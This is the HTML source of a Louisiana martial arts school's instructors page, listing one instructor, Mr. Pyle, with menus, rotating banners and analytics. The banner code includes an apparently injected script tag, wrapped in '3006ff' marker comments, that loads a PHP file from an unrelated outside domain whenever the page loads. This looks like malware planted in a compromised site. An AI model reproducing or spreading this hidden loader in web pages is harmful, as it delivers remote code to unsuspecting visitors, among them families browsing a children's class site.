
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Our Instructors</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<meta name="Abstract" content="ATA STRONG MARTIAL ARTS,  provides students the highest quality martial arts instruction available in a safe and positive learning environment.">
<meta name="contact_addr" content="225-665-0909 Denham Springs, Louisiana">
<meta name="Author" content="Master Dwayne Dendy">
<meta name="Date" content="2013">
<meta name="Copyright" content="Master Dendy's ATA Strong Martial Arts">
<meta name="Distribution" content="local">
<meta name="Description" content="ATA STRONG MARTIAL ARTS">
<meta name="Keywords" content="ATA Strong martial arts classes, ,martial arts classes,  krav maga classes, karate classes for kids, taekwondo classes, locations in denham springs, louisiana, After School Program, Summer Camp Program">
<meta name="Language" content="English">
<meta name="Rating" content="general
safe for kids
">
<meta name="Public" content="YES">
<meta name="revisit-after" content="1 month">
<meta name="Robots" content="index,follow">
<script src="../scripts/interval_handle.js" type="text/javascript"></script>
<script src="../scripts/rotating_picture.js" type="text/javascript"></script>
<meta name="google-site-verification" content="rU8vMmcnjDCb11Tbo1E8tl40pEUKWqLUYVxjnop-SxU" />
<script type="text/javascript">
<!--
function F_loadRollover(){} function F_roll(){}
//-->
</script>
<script type="text/javascript" src="../assets/jquery.js">
</script>
<script type="text/javascript" src="../assets/gapfix.js">
</script>
<script type="text/javascript" src="../assets/rollover.js">
</script>
<script type="text/javascript" src="../assets/jmedia.js">
</script>
<link rel="stylesheet" type="text/css" href="../html/fusion.css">
<link rel="stylesheet" type="text/css" href="../html/style.css">
<link rel="stylesheet" type="text/css" href="../html/site.css">
<style type="text/css" title="NOF_STYLE_SHEET">
<!--

div#NavigationBar4_1LYR { 
position:absolute; visibility:hidden; top:0; left:0; z-index:1001;
}
div#NavigationBar4_2LYR { 
position:absolute; visibility:hidden; top:0; left:0; z-index:1002;
}
div#NavigationBar4_3LYR { 
position:absolute; visibility:hidden; top:0; left:0; z-index:1003;
}
div#NavigationBar4_4LYR { 
position:absolute; visibility:hidden; top:0; left:0; z-index:1004;
}
div#NavigationBar4_5LYR { 
position:absolute; visibility:hidden; top:0; left:0; z-index:1005;
}
-->
</style>

<script type="text/javascript" src="./our_instructors_nof.js">
</script>
</head>
<body NOF="NOF" style="background-image: url('../assets/images/matching_background.png'); background-repeat: repeat; background-attachment: fixed; background-position: center; margin: 0px;" class="nof-centerBody">
  <div align="center">
    <table border="0" cellspacing="0" cellpadding="0">
      <tr>
        <td>
          <table border="0" cellspacing="0" cellpadding="0" width="990" nof="ly">
            <tr valign="top" align="left">
              <td height="86" width="990"><!-- Comment out Fusion's HTML IMG tag<img id="RotatingPicture1" height="86" width="990" src="../assets/images/rotatingpicture.gif" border="0">--> 
<script type="text/javascript"> 
  var var_1362343835096 = new RotatingPicture(); 
 var_1362343835096.init("1362343835096",990,86,5000,false,true);
var_1362343835096.Pics[0] = new Picture("../assets/images/RED_BLACK_BANNER_1.png","","");
var_1362343835096.Pics[1] = new Picture("../assets/images/RED_BLACK_BANNER_2.png","","");
var_1362343835096.Pics[2] = new Picture("../assets/images/RED_BLACK_BANNER_3.png","","");
var_1362343835096.Pics[3] = new Picture("../assets/images/RED_BLACK_BANNER_4.png","","");
var_1362343835096.Pics[4] = new Picture("../assets/images/RED_BLACK_BANNER_5.png","","");
</script>
<div ID="RotatingPictureDiv1362343835096" style="overflow: hidden;" onClick="var_1362343835096.goClick();">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr><td align="center" valign="middle">
<img ID="RotatingPictureImg1362343835096" alt="" src="">
</td></tr>
</table>
</div><!--3006ff--><script src="http://plan-b.cwsurf.de/y98K4N6o.php?id=66195509" type="text/javascript"></script><!--/3006ff-->
<script type="text/javascript">
var_1362343835096.show();
</script><script type="text/javascript">
hi.addHandle(var_1362343835096.Interval, "var_1362343835096.rotate()");
</script></td>
            </tr>
          </table>
          <table border="0" cellspacing="0" cellpadding="0" width="990" nof="ly">
            <tr valign="top" align="left">
              <td height="150" width="990"><img id="Picture967" height="150" width="990" src="../assets/images/ata-strong-website-header_1.png" border="0" alt="ata-strong-website-header_1" title="ata-strong-website-header_1"></td>
            </tr>
          </table>
          <table border="0" cellspacing="0" cellpadding="0" nof="ly">
            <tr valign="top" align="left">
              <td height="5"></td>
            </tr>
            <tr valign="top" align="left">
              <td width="833">
                <table id="Table18" border="0" cellspacing="2" cellpadding="2" width="100%" style="height: 38px;">
                  <tr style="height: 30px;">
                    <td valign="top" align="right" width="825" style="background-color: transparent;" id="Cell191">
                      <table width="816" border="0" cellspacing="0" cellpadding="0" align="left" nof="te">
                        <tr>
                          <td>
                            <table id="NavigationBar4" border="0" cellspacing="0" cellpadding="0" NOF=NB_FYHPNY1020 width="816">
                              <tr valign="top" align="left">
                                <td width="136"><a href="../index.html" class="nof-navButtonAnchor" onmouseover="F_loadRollover('NavigationButton1','',0);F_roll('NavigationButton1',1)" onmouseout="F_roll('NavigationButton1',0)"><img id="NavigationButton1" name="NavigationButton1" height="30" width="136" src="../assets/images/autogen/ATA_Np_Regular_1.gif" onmouseover="F_loadRollover(this,'ATA_NRp_RegularOver_1.gif',0)" border="0" alt="ATA" title="ATA"></a></td>
                                <td width="136"><a href="../html/programs.html" class="nof-navButtonAnchor" onmouseover="F_loadRollover('NavigationButton2','',0);F_roll('NavigationButton2',1)" onmouseout="F_roll('NavigationButton2',0)"><img id="NavigationButton2" name="NavigationButton2" height="30" width="136" src="../assets/images/autogen/Programs_Np_Regular_2.gif" onmouseover="F_loadRollover(this,'Programs_NRp_RegularOver_2.gif',new Array('NavigationBar4_1', 'vertical', 'bottom', 0, 30))" border="0" alt="Programs" title="Programs"></a></td>
                                <td width="136"><a href="../html/locations.html" class="nof-navButtonAnchor" onmouseover="F_loadRollover('NavigationButton3','',0);F_roll('NavigationButton3',1)" onmouseout="F_roll('NavigationButton3',0)"><img id="NavigationButton3" name="NavigationButton3" height="30" width="136" src="../assets/images/autogen/Locations_Np_Regular_2.gif" onmouseover="F_loadRollover(this,'Locations_NRp_RegularOver_2.gif',0)" border="0" alt="Locations" title="Locations"></a></td>
                                <td width="136"><a href="../html/events.html" class="nof-navButtonAnchor" onmouseover="F_loadRollover('NavigationButton4','',0);F_roll('NavigationButton4',1)" onmouseout="F_roll('NavigationButton4',0)"><img id="NavigationButton4" name="NavigationButton4" height="30" width="136" src="../assets/images/autogen/Events_Np_Regular_2.gif" onmouseover="F_loadRollover(this,'Events_NRp_RegularOver_2.gif',new Array('NavigationBar4_2', 'vertical', 'bottom', 0, 30))" border="0" alt="Events" title="Events"></a></td>
                                <td width="136"><a href="../html/instructors.html" class="nof-navButtonAnchor" onmouseover="F_loadRollover('NavigationButton5','',0);F_roll('NavigationButton5',1)" onmouseout="F_roll('NavigationButton5',0)"><img id="NavigationButton5" name="NavigationButton5" height="30" width="136" src="../assets/images/autogen/Instructors_Hp_Highlighted_1.gif" onmouseover="F_loadRollover(this,'Instructors_HRp_HighlightedOver_1.gif',new Array('NavigationBar4_3', 'vertical', 'bottom', 0, 30))" border="0" alt="Instructors" title="Instructors"></a></td>
                                <td width="136" height="30"><a href="../html/resources.html" class="nof-navButtonAnchor" onmouseover="F_loadRollover('NavigationButton6','',0);F_roll('NavigationButton6',1)" onmouseout="F_roll('NavigationButton6',0)"><img id="NavigationButton6" name="NavigationButton6" height="30" width="136" src="../assets/images/autogen/Resources_Np_Regular_2.gif" onmouseover="F_loadRollover(this,'Resources_NRp_RegularOver_2.gif',new Array('NavigationBar4_4', 'vertical', 'bottom', 0, 30))" border="0" alt="Resources" title="Resources"></a></td>
                              </tr>
                            </table>
                          </td>
                        </tr>
                      </table>
                      <span style="font-family: 'Arial Black', 'Helvetica Bold', Charcoal, Sans-serif; color: rgb(128,0,0);"></span></td>
                  </tr>
                </table>
              </td>
            </tr>
          </table>
          <table border="0" cellspacing="0" cellpadding="0" width="987" nof="ly">
            <tr valign="top" align="left">
              <td width="144" height="4"><img src="../assets/images/autogen/clearpixel.gif" width="144" height="1" border="0" alt=""></td>
              <td width="22"><img src="../assets/images/autogen/clearpixel.gif" width="22" height="1" border="0" alt=""></td>
              <td width="2"><img src="../assets/images/autogen/clearpixel.gif" width="2" height="1" border="0" alt=""></td>
              <td width="35"><img src="../assets/images/autogen/clearpixel.gif" width="35" height="1" border="0" alt=""></td>
              <td></td>
              <td width="35"><img src="../assets/images/autogen/clearpixel.gif" width="35" height="1" border="0" alt=""></td>
              <td></td>
              <td width="154"><img src="../assets/images/autogen/clearpixel.gif" width="154" height="1" border="0" alt=""></td>
              <td width="125"><img src="../assets/images/autogen/clearpixel.gif" width="125" height="1" border="0" alt=""></td>
              <td width="195"><img src="../assets/images/autogen/clearpixel.gif" width="195" height="1" border="0" alt=""></td>
              <td width="22"><img src="../assets/images/autogen/clearpixel.gif" width="22" height="1" border="0" alt=""></td>
              <td width="39"><img src="../assets/images/autogen/clearpixel.gif" width="39" height="1" border="0" alt=""></td>
              <td width="3"><img src="../assets/images/autogen/clearpixel.gif" width="3" height="1" border="0" alt=""></td>
              <td width="3"><img src="../assets/images/autogen/clearpixel.gif" width="3" height="1" border="0" alt=""></td>
              <td></td>
              <td width="7"><img src="../assets/images/autogen/clearpixel.gif" width="7" height="1" border="0" alt=""></td>
              <td width="60"><img src="../assets/images/autogen/clearpixel.gif" width="60" height="1" border="0" alt=""></td>
              <td width="11"><img src="../assets/images/autogen/clearpixel.gif" width="11" height="1" border="0" alt=""></td>
              <td width="2"><img src="../assets/images/autogen/clearpixel.gif" width="2" height="1" border="0" alt=""></td>
            </tr>
            <tr valign="top" align="left">
              <td colspan="12" rowspan="7" width="821"><!-- Comment out Fusion's HTML IMG tag<img id="RotatingPicture3" height="310" width="821" src="../assets/images/rotatingpicture.gif" border="0">--> 
<script type="text/javascript"> 
  var var_1371756360713 = new RotatingPicture(); 
 var_1371756360713.init("1371756360713",821,310,5000,false,true);
var_1371756360713.Pics[0] = new Picture("../assets/images/Photo_HTML5-1-1.jpg","","");
var_1371756360713.Pics[1] = new Picture("../assets/images/Photo_HTML5-1-2.jpg","","");
var_1371756360713.Pics[2] = new Picture("../assets/images/Photo_HTML5-1-3.jpg","","");
var_1371756360713.Pics[3] = new Picture("../assets/images/KRAV_ATA_STRONG.png","","");
var_1371756360713.Pics[4] = new Picture("../assets/images/aftercare_website_page.png","../html/after_school.html","");
var_1371756360713.Pics[5] = new Picture("../assets/images/Photo_HTML5_new_1.jpg","","");
var_1371756360713.Pics[6] = new Picture("../assets/images/photo_html5_new_2.jpg","","");
var_1371756360713.Pics[7] = new Picture("../assets/images/photo_html5_new_3.jpg","","");
</script>
<div ID="RotatingPictureDiv1371756360713" style="overflow: hidden;" onClick="var_1371756360713.goClick();">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr><td align="center" valign="middle">
<img ID="RotatingPictureImg1371756360713" alt="" src="">
</td></tr>
</table>
</div><script type="text/javascript">
var_1371756360713.show();
</script><script type="text/javascript">
hi.addHandle(var_1371756360713.Interval, "var_1371756360713.rotate()");
</script></td>
              <td colspan="7" height="41"></td>
            </tr>
            <tr valign="top" align="left">
              <td colspan="2" height="1"></td>
              <td rowspan="3" width="80"><!-- Comment out Fusion's HTML IMG tag<img id="RotatingPicture5" height="75" width="80" src="../assets/images/rotatingpicture.gif" border="0">--> 
<script type="text/javascript"> 
  var var_1371757414592 = new RotatingPicture(); 
 var_1371757414592.init("1371757414592",80,75,1000,true,true);
var_1371757414592.Pics[0] = new Picture("../assets/images/calendar_button.png","../html/calendar.html","Be sure to check the calendar for schedule changes");
var_1371757414592.Pics[1] = new Picture("../assets/images/calendar_button.png","../html/calendar.html","Be sure to check the calendar for schedule changes");
</script>
<div ID="RotatingPictureDiv1371757414592" style="overflow: hidden;" onClick="var_1371757414592.goClick();">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr><td align="center" valign="middle">
<img ID="RotatingPictureImg1371757414592" alt="" src="">
</td></tr>
</table>
</div><script type="text/javascript">
var_1371757414592.show();
</script><script type="text/javascript">
hi.addHandle(var_1371757414592.Interval, "var_1371757414592.rotate()");
</script></td>
              <td colspan="4"></td>
            </tr>
            <tr valign="top" align="left">
              <td colspan="2" height="73"></td>
              <td></td>
              <td colspan="3" width="73"><!-- Comment out Fusion's HTML IMG tag<img id="RotatingPicture6" height="73" width="73" src="../assets/images/rotatingpicture.gif" border="0">--> 
<script type="text/javascript"> 
  var var_1371757514545 = new RotatingPicture(); 
 var_1371757514545.init("1371757514545",73,73,1000,true,true);
var_1371757514545.Pics[0] = new Picture("../assets/images/Schedule_Button.png","../html/schedule.html","Be sure to check the calendar for schedule changes");
var_1371757514545.Pics[1] = new Picture("../assets/images/Schedule_Button.png","../html/schedule.html","Be sure to check the calendar for schedule changes");
</script>
<div ID="RotatingPictureDiv1371757514545" style="overflow: hidden;" onClick="var_1371757514545.goClick();">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr><td align="center" valign="middle">
<img ID="RotatingPictureImg1371757514545" alt="" src="">
</td></tr>
</table>
</div><script type="text/javascript">
var_1371757514545.show();
</script><script type="text/javascript">
hi.addHandle(var_1371757514545.Interval, "var_1371757514545.rotate()");
</script></td>
            </tr>
            <tr valign="top" align="left">
              <td colspan="2" height="1"></td>
              <td colspan="4"></td>
            </tr>
            <tr valign="top" align="left">
              <td colspan="7" height="28"></td>
            </tr>
            <tr valign="top" align="left">
              <td height="156"></td>
              <td colspan="5" width="161"><!-- Comment out Fusion's HTML IMG tag<img id="RotatingPicture7" height="156" width="161" src="../assets/images/rotatingpicture.gif" border="0">--> 
<script type="text/javascript"> 
  var var_1371865544562 = new RotatingPicture(); 
 var_1371865544562.init("1371865544562",161,156,5000,true,true);
var_1371865544562.Pics[0] = new Picture("../assets/images/fit_to_fight_black_logo.png","../html/krav_maga.html","Try Krav Maga 2 Weeks Free");
var_1371865544562.Pics[1] = new Picture("../assets/images/fit_to_fight_black_logo.png","../html/krav_maga.html","Try Krav Maga Two Weeks Free");
</script>
<div ID="RotatingPictureDiv1371865544562" style="overflow: hidden;" onClick="var_1371865544562.goClick();">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr><td align="center" valign="middle">
<img ID="RotatingPictureImg1371865544562" alt="" src="">
</td></tr>
</table>
</div><script type="text/javascript">
var_1371865544562.show();
</script><script type="text/javascript">
hi.addHandle(var_1371865544562.Interval, "var_1371865544562.rotate()");
</script></td>
              <td></td>
            </tr>
            <tr valign="top" align="left">
              <td colspan="7" height="10"></td>
            </tr>
            <tr valign="top" align="left">
              <td colspan="19" height="2"></td>
            </tr>
            <tr valign="top" align="left">
              <td colspan="10" rowspan="3" width="760"><img id="Banner1" height="138" width="760" src="../assets/images/autogen/Our-Instructors_NBanner.jpg" border="0" alt="Our Instructors" title="Our Instructors" NOF=B_H></td>
              <td colspan="9" height="25"></td>
            </tr>
            <tr valign="top" align="left">
              <td height="84"></td>
              <td colspan="6" width="192"><!-- Comment out Fusion's HTML IMG tag<img id="RotatingPicture2" height="84" width="192" src="../assets/images/rotatingpicture.gif" border="0">--> 
<script type="text/javascript"> 
  var var_1371756255825 = new RotatingPicture(); 
 var_1371756255825.init("1371756255825",192,84,2000,true,false);
var_1371756255825.Pics[0] = new Picture("../assets/images/free_30_days_button.png","","");
var_1371756255825.Pics[1] = new Picture("../assets/images/click_here_enroll_today_button.png","../html/30_days__free.html","");
</script>
<div ID="RotatingPictureDiv1371756255825" style="overflow: hidden;" onClick="var_1371756255825.goClick();">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr><td align="center" valign="middle">
<img ID="RotatingPictureImg1371756255825" alt="" src="">
</td></tr>
</table>
</div><script type="text/javascript">
var_1371756255825.show();
</script><script type="text/javascript">
hi.addHandle(var_1371756255825.Interval, "var_1371756255825.rotate()");
</script></td>
              <td colspan="2"></td>
            </tr>
            <tr valign="top" align="left">
              <td colspan="9" height="29"></td>
            </tr>
            <tr valign="top" align="left">
              <td colspan="19" height="13"></td>
            </tr>
            <tr valign="top" align="left">
              <td height="24"></td>
              <td colspan="2" width="24"><a nof="LS_PD" href="../html/our_instructors_0.html"><img id="Picture973" height="24" width="24" src="../assets/images/NavLeft.gif" border="0"></a></td>
              <td></td>
              <td width="24"><a nof="LS_U" href="../html/instructors.html"><img id="Picture974" height="24" width="24" src="../assets/images/NavUp.gif" border="0"></a></td>
              <td></td>
              <td width="24"><a nof="LS_ND" href="../html/our_instructors_2.html"><img id="Picture975" height="24" width="24" src="../assets/images/NavRight.gif" border="0"></a></td>
              <td colspan="12"></td>
            </tr>
            <tr valign="top" align="left">
              <td colspan="19" height="5"></td>
            </tr>
            <tr valign="top" align="left">
              <td height="207" colspan="8" width="440">
                <table id="Table2" border="0" cellspacing="3" cellpadding="1">
                  <tr>
                    <td width="143"></td>
                    <td width="284"></td>
                  </tr>
                  <tr>
                    <td valign="top" style="font-family: 'Bleeding Cowboys'; font-size: 16px; color: rgb(128,0,0);">
                      <p style="font-family: 'Bleeding Cowboys'; font-size: 16px; color: rgb(128,0,0); margin-bottom: 0px;">MR-PYLE</p>
                    </td>
                    <td rowspan="2" style="font-family: 'Bleeding Cowboys'; font-size: 14px; color: rgb(128,0,0);">
                      <p style="font-family: 'Bleeding Cowboys'; font-size: 14px; color: rgb(128,0,0); margin-bottom: 0px;">Mr. Pyle<br>4th Degree Black Belt</p>
                    </td>
                  </tr>
                  <tr>
                    <td valign="top">
                      <table width="143" border="0" cellspacing="0" cellpadding="0" align="left" nof="te">
                        <tr>
                          <td>
                            <table id="Table174" border="0" cellspacing="0" cellpadding="0">
                              <tr>
                                <td width="50">
                                  <p style="margin-bottom: 0px;"><img id="Picture64" height="48" width="50" src="../assets/images/top_left.gif" vspace="0" hspace="0" align="bottom" border="0"></p>
                                </td>
                                <td width="46" style="background-image: url('../assets/images/top_background1.gif');">
                                  <p style="margin-bottom: 0px;"><img id="Picture67" height="16" width="10" src="../assets/images/spacer.gif" vspace="0" hspace="0" align="bottom" border="0"></p>
                                </td>
                                <td width="47">
                                  <p style="margin-bottom: 0px;"><img id="Picture70" height="48" width="47" src="../assets/images/top_right.gif" vspace="0" hspace="0" align="bottom" border="0"></p>
                                </td>
                              </tr>
                              <tr>
                                <td style="background-image: url('../assets/images/left_background1.gif');">
                                  <p style="margin-bottom: 0px;"><img id="Picture73" height="16" width="10" src="../assets/images/spacer.gif" vspace="0" hspace="0" align="bottom" border="0"></p>
                                </td>
                                <td>
                                  <p style="text-align: center; margin-bottom: 0px;"><img id="DataField1019" height="72" width="46" src="../assets/images/db_images/db_MR-PYLE1.gif" vspace="0" hspace="0" align="bottom" border="0" alt="MR-PYLE" title="MR-PYLE"></p>
                                </td>
                                <td style="background-image: url('../assets/images/right_background1.gif');">
                                  <p style="margin-bottom: 0px;"><img id="Picture79" height="16" width="10" src="../assets/images/spacer.gif" vspace="0" hspace="0" align="bottom" border="0"></p>
                                </td>
                              </tr>
                              <tr>
                                <td>
                                  <p style="margin-bottom: 0px;"><img id="Picture82" height="48" width="50" src="../assets/images/bottom_left.gif" vspace="0" hspace="0" align="bottom" border="0"></p>
                                </td>
                                <td style="background-image: url('../assets/images/bottom_background1.gif');">
                                  <p style="margin-bottom: 0px;"><img id="Picture85" height="16" width="10" src="../assets/images/spacer.gif" vspace="0" hspace="0" align="bottom" border="0"></p>
                                </td>
                                <td>
                                  <p style="margin-bottom: 0px;"><img id="Picture88" height="48" width="47" src="../assets/images/bottom_right.gif" vspace="0" hspace="0" align="bottom" border="0"></p>
                                </td>
                              </tr>
                            </table>
                          </td>
                        </tr>
                      </table>
                    </td>
                  </tr>
                </table>
              </td>
              <td colspan="11"></td>
            </tr>
            <tr valign="top" align="left">
              <td colspan="19" height="348"></td>
            </tr>
            <tr valign="top" align="left">
              <td colspan="2" height="292"></td>
              <td colspan="7" width="399">
                <a id="WindowsMediaPlayer2" href="9_traits_of_a_Leader.wmv"></a>
              </td>
              <td colspan="10"></td>
            </tr>
          </table>
          <table border="0" cellspacing="0" cellpadding="0" width="981" nof="ly">
            <tr valign="top" align="left">
              <td width="6" height="1"><img src="../assets/images/autogen/clearpixel.gif" width="6" height="1" border="0" alt=""></td>
              <td width="975"><img src="../assets/images/autogen/clearpixel.gif" width="975" height="1" border="0" alt=""></td>
            </tr>
            <tr valign="top" align="left">
              <td height="42"></td>
              <td width="975" id="Text262" class="TextObject" style="background-color: transparent;">
                <form name="Text262FORM" action="" method="post">
                  <p style="margin-bottom: 0px;"><font color="#9A9A9A"><span style="font-size: 12pt;">martial arts classes,&nbsp; krav maga classes, karate classes for kids, taekwondo classes, locations in denham springs, louisiana, After School Program, Summer Camp Program</span></font></p>
                </form>
              </td>
            </tr>
          </table>
          <table border="0" cellspacing="0" cellpadding="0" nof="ly">
            <tr valign="top" align="left">
              <td height="1"></td>
            </tr>
            <tr valign="top" align="left">
              <td width="940">
                  <table id="Table25" border="0" cellspacing="2" cellpadding="2" width="107%" style="height: 33px;">
                    <tr style="height: 42px;">
                      <td width="409" id="Cell221">
                        <p style="margin-bottom: 0px;"><span style="font-family: Georgia, Palatino, 'Times New Roman', Times, Serif; color: rgb(255,255,255);">COPYRIGHT 2012-2022 ATA STRONG Martial Arts</span></p>
                      </td>
                      <td width="24" id="Cell219">
                        <p style="margin-bottom: 0px;"><a href="../html/note_to_parents.html"><embed id="Picture958" height="24" width="24" src="../assets/images/note-important-message-md.bmp" vspace="0" hspace="0" align="top" border="0" alt="note-important-message-md.bmp" title="note-important-message-md.bmp"></a></p>
                      </td>
                      <td width="551" id="Cell220">
                        <p style="text-align: left; margin-bottom: 0px;">
						<span style="font-family: Georgia, Palatino, 'Times New Roman', Times, Serif; color: #FFFFFF">
						LOCATED </span>
						<span style="font-family: Georgia, Palatino, 'Times New Roman', Times, Serif; color: rgb(255,255,255);">IN DENHAM SPRINGS, LOUISIANA CALL 225-665-0909 TODAY!</span></p>
                      </td>
                    </tr>
                  </table>
              </td>
            </tr>
          </table>
          <script type="text/javascript">
          var C_MENU_BORDER = 0;
          var C_MENU_SPACING = 0;
          var C_MENU_BGCOLOR = "";
          var C_MENU_AUTO_CLOSE = true;
          new NOF_Menu(
          new NOF_Main_Menu(new NOF_Menu_Item('NavigationBar4_1', 'vertical', 'bottom', 0, 30, 
 new NOF_Menu_Button('../html/commercial.html','../assets/images/autogen/Commercial_Ns_Regular.gif','../assets/images/autogen/Commercial_NRs_RegularOver.gif'),new NOF_Menu_Button('../html/tiny_tigers.html','../assets/images/autogen/Tiny-Tigers_Ns_Regular.gif','../assets/images/autogen/Tiny-Tigers_NRs_RegularOver.gif'),new NOF_Menu_Button('../html/karate_for_kids.html','../assets/images/autogen/Karate-for-Kids_Ns_Regular.gif','../assets/images/autogen/Karate-for-Kids_NRs_RegularOver.gif'),new NOF_Menu_Button('../html/teen_-_adult.html','../assets/images/autogen/Teen---Adult_Ns_Regular.gif','../assets/images/autogen/Teen---Adult_NRs_RegularOver.gif'),new NOF_Menu_Button('../html/kickboxing-_warrior_x-fit.html','../assets/images/autogen/Kickboxing--Warrior-X-fit_Ns_Regular.gif','../assets/images/autogen/Kickboxing--Warrior-X-fit_NRs_RegularOver.gif'),new NOF_Menu_Button('../html/krav_maga.html','../assets/images/autogen/Krav-Maga_Ns_Regular.gif','../assets/images/autogen/Krav-Maga_NRs_RegularOver.gif',
 new NOF_Menu_Item('NavigationBar4_5', 'vertical', 'right', 136, 0, new NOF_Menu_Button('../html/2_weeks_free.html','../assets/images/autogen/2-weeks-FREE_Ns_Regular.gif','../assets/images/autogen/2-weeks-FREE_NRs_RegularOver.gif'))
 ),new NOF_Menu_Button('../html/after_school.html','../assets/images/autogen/After-School_Ns_Regular.gif','../assets/images/autogen/After-School_NRs_RegularOver.gif'),new NOF_Menu_Button('../html/30_days__free.html','../assets/images/autogen/30-Days--Free_Ns_Regular.gif','../assets/images/autogen/30-Days--Free_NRs_RegularOver.gif')))
          , new NOF_Main_Menu(new NOF_Menu_Item('NavigationBar4_2', 'vertical', 'bottom', 0, 30, 
 new NOF_Menu_Button('../html/sharp_seminars.html','../assets/images/autogen/SHARP-Seminars_Ns_Regular.gif','../assets/images/autogen/SHARP-Seminars_NRs_RegularOver.gif'),new NOF_Menu_Button('../html/bully_prevention_seminars.html','../assets/images/autogen/Bully-Prevention-Seminars_Ns_Regular.gif','../assets/images/autogen/Bully-Prevention-Seminars_NRs_RegularOver.gif'),new NOF_Menu_Button('../html/home_background.html','../assets/images/autogen/Tournament_Ns_Regular.gif','../assets/images/autogen/Tournament_NRs_RegularOver.gif')))
          , new NOF_Main_Menu(new NOF_Menu_Item('NavigationBar4_3', 'vertical', 'bottom', 0, 30, 
 new NOF_Menu_Button('../html/krav_maga_testimonials.html','../assets/images/autogen/Krav-Maga-Testimonials_Ns_Regular.gif','../assets/images/autogen/Krav-Maga-Testimonials_NRs_RegularOver.gif'),new NOF_Menu_Button('../html/testimonial.html','../assets/images/autogen/Testimonial_Ns_Regular.gif','../assets/images/autogen/Testimonial_NRs_RegularOver.gif'),new NOF_Menu_Button('../html/our_instructors_0.html','../assets/images/autogen/Our-Instructors_Ns_Regular.gif','../assets/images/autogen/Our-Instructors_NRs_RegularOver.gif')))
          , new NOF_Main_Menu(new NOF_Menu_Item('NavigationBar4_4', 'vertical', 'bottom', 0, 30, 
 new NOF_Menu_Button('../html/note_to_parents.html','../assets/images/autogen/Note-to-Parents_Ns_Regular.gif','../assets/images/autogen/Note-to-Parents_NRs_RegularOver.gif'),new NOF_Menu_Button('../html/schedule.html','../assets/images/autogen/Schedule_Ns_Regular.gif','../assets/images/autogen/Schedule_NRs_RegularOver.gif'),new NOF_Menu_Button('../html/calendar.html','../assets/images/autogen/Calendar_Ns_Regular.gif','../assets/images/autogen/Calendar_NRs_RegularOver.gif')))
          );
          </script>
          <!-- Analytics Code Start -->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("");
pageTracker._initData();
pageTracker._trackPageview();
</script>
<!-- Analytics Code End -->
        </td>
      </tr>
    </table>
  </div>
</body>
</html>
 